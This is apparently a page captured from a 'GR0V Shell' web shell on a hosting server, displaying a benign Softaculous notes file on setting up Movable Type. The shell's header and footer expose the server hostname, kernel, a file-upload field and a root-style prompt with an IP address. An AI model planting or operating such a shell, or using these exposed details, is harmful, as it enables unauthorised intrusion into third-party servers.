? GR0V Shell

GR0V shell

Linux server122.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64

Path : /var/softaculous/mt/
File Upload :
Current File : //var/softaculous/mt/notes.txt

1) Include these two lines in mt.cgi it contains the path of packages.

		use lib '/hsphere/shared/lib/perl5';
		use lib '/hsphere/shared/lib/perl5/site_perl';
		
2) If You still get error after doing above step that only follow this step 

	If movabletype is not running that please rename mt-config.cgi to another name and run mt-check.cgi file it will show you missing plugins.
	If DBD:mysql is not installed than install it using following command :
		perl -MCPAN -e 'install Bundle::DBD::mysql'
		
3) After Installation create one page under website. Give title home and publish it. then dump sql

4) .htaccess is required so do not remove .htaccess even if it is not created by MT.

5) Make script where MySQL engine is InnoDB

T1KUS90T
  root-grov@198.54.114.191:~$